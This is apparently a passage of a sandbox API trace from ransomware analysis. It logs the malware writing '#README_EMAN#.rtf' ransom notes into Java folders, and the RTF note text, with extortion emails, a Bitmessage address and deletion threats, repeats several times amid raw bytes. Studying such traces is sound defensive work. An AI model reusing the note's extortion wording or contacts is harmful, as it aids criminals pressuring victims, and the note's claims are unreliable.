ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nV\x14vÇ/îÓ®÷¹1hºõÌ\x8fêr\x08?h\x9fÔ£\x04", lpUsedDefaultChar=0x0) returned 8717 [0207.977] WriteFile (in: hFile=0x2fc, lpBuffer=0x2476d68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476d68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.977] CloseHandle (hObject=0x2fc) returned 1 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\#readme_eman#.rtf")) returned 0x20 [0207.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\#readme_eman#.rtf")) returned 0xffffffff [0207.978] GetLastError () returned 0x2 [0207.978] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0207.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 